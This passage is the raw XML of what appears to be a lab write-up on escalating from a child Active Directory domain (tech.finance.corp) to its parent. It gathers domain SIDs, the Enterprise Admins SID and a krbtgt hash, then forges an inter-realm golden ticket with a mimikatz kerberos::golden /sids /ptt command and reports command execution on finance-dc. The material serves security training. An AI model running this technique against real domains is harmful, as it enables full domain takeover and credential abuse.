          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Child</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SID-</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="0FEE4B9C" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-DomainSID -Domain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tech.finance</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996DC6D" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18840165" w14:textId="00841BEA" w:rsidR="00E40A94" w:rsidRDefault="00E40A94" w:rsidP="00E40A94">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Root</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E40A94">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SID-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F8060" w14:textId="31162668" w:rsidR="00E40A94" w:rsidRDefault="004D15E8" w:rsidP="00E40A94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-DomainSID -Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>finance.corp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35094F5B" w14:textId="77777777" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enteprise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admins </w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SID-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C05E0C1" w14:textId="6B9E7A42" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="58"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Format:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>RootDomainSID-</w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>519</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5295E" w14:textId="47A99F88" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="58"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>hash-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159FF4B" w14:textId="04A3C6C0" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="58"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0C79D0" w14:textId="616A594D" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="58"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42106E82" wp14:editId="7E0129A5">
            <wp:extent cx="5942912" cy="2611593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9"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="26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C2EB6" w14:textId="0DA7A18B" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="00E40A94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ED1C0C" w14:textId="0F1D7E30" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E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46476891"/>
      <w:bookmarkStart w:id="34" w:name="_Toc146477329"/>
      <w:r w:rsidRPr="004D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-Realm TGT:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="5A48D1F4" w14:textId="77777777" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8"/>
    <w:p w14:paraId="4F07B5FA" w14:textId="3BF8E358" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8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D15E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Once</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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ll the </w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E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above</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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D15E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steps</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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D15E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are</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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D15E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done,</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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 can import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D15E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Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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nd start creating </w:t>
      </w:r>
      <w:r w:rsidRPr="004D15E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the</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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D15E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interdimensional</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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GT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403A6BC" w14:textId="77777777" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3324"/>
          <w:tab w:val="left" w:pos="6944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.\mimikatz.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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golden</w:t>
      </w:r>
      <w:r w:rsidRPr="004D1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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B2066B7" w14:textId="77777777" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6680"/>
        </w:tabs>
        <w:spacing w:before="5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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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domain:tech</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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.finance.corp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ChildDomainSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25117451" w14:textId="77777777" w:rsidR="004D15E8" w:rsidRPr="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E8">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D1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4D1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ds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D1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priseAdminSID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D1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btgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D1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btgtHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D1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&gt; </w:t>
      </w:r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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D15E8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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AF8D8" w14:textId="70C9637D" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E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FA9743" w14:textId="27D2D0E8" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E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AC5BA4F" wp14:editId="2CC1F4A3">
            <wp:extent cx="5942912" cy="2601865"/>
            <wp:effectExtent l="0" t="0" r="127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5"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="26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516E4" w14:textId="4C9E82F0" w:rsidR="004D15E8" w:rsidRDefault="004D15E8" w:rsidP="004D15E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e can see that we can successfully access the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finance-dc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file system</w:t>
      </w:r>
      <w:r w:rsidR="00F51A3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08E48F4" w14:textId="6D415BF0" w:rsidR="00F51A31" w:rsidRPr="004D15E8" w:rsidRDefault="00F51A31" w:rsidP="004D15E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A535646" wp14:editId="73F2572B">
            <wp:extent cx="5943366" cy="2590165"/>
            <wp:effectExtent l="0" t="0" r="63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9"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="259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447C1" w14:textId="7F70F1B5" w:rsidR="004D15E8" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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et</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execution</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>altservice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parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF59FC5" w14:textId="2BFF1B83" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CF4D59" w14:textId="0B6E69FE" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11ACB788" wp14:editId="274945B8">
            <wp:extent cx="5943366" cy="2632206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6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="263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FCE8" w14:textId="18DDE1B6" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1328BC97" w14:textId="0ED51F1F" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC09CCB" wp14:editId="4EEE1B55">
            <wp:extent cx="5943366" cy="2894965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4" t="9076" r="884" b="-9076"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="28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5"/>
    </w:p>
    <w:p w14:paraId="2117AE06" w14:textId="03B0C50A" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F83B426" w14:textId="5A6F6777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C7B7BF7" wp14:editId="3F89142B">
            <wp:extent cx="5943366" cy="2611186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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="261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7F9EF" w14:textId="452F5422" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EED7636" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
      <w:r>
        <w:t>And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seen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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>execution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finance-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>dc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64270A" w14:textId="6F3A9999" w:rsidR="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3623833C" w14:textId="77777777" w:rsidR="00F51A31" w:rsidRPr="00F51A31" w:rsidRDefault="00F51A31" w:rsidP="00F51A31">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A6CC9B" w14:textId="77777777" w:rsidR="00E40A94" w:rsidRPr="005B1265" w:rsidRDefault="00E40A94" w:rsidP="00C53AE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906A07" w14:textId="77777777" w:rsidR="005B1265" w:rsidRPr="00C53AEC" w:rsidRDefault="005B1265" w:rsidP="00C53AE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CD5E86" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C91567" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2940FA58" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC"/>
    <w:p w14:paraId="7A88CE47" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC"/>
    <w:p w14:paraId="561BEED3" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00C53AEC" w:rsidRDefault="00C53AEC" w:rsidP="00C53AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="290" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="142"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CEC169" w14:textId="77777777" w:rsidR="00C53AEC" w:rsidRPr="00282DB8" w:rsidRDefault="00C53AEC" w:rsidP="00282DB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="151"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4A5B29" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8"/>
    <w:p w14:paraId="5DABAD2D" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRPr="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8"/>
    <w:p w14:paraId="07871B11" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRPr="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00282DB8"/>
    <w:p w14:paraId="5BF79278" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRPr="00282DB8" w:rsidRDefault="00282DB8" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="138"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086019D7" w14:textId="77777777" w:rsidR="00282DB8" w:rsidRPr="00BE0CB1" w:rsidRDefault="00282DB8" w:rsidP="00BE0CB1"/>
    <w:p w14:paraId="52D6339B" w14:textId="77777777" w:rsidR="00BE0CB1" w:rsidRPr="00BE0CB1" w:rsidRDefault="00BE0CB1" w:rsidP="00BE0CB1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="95" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
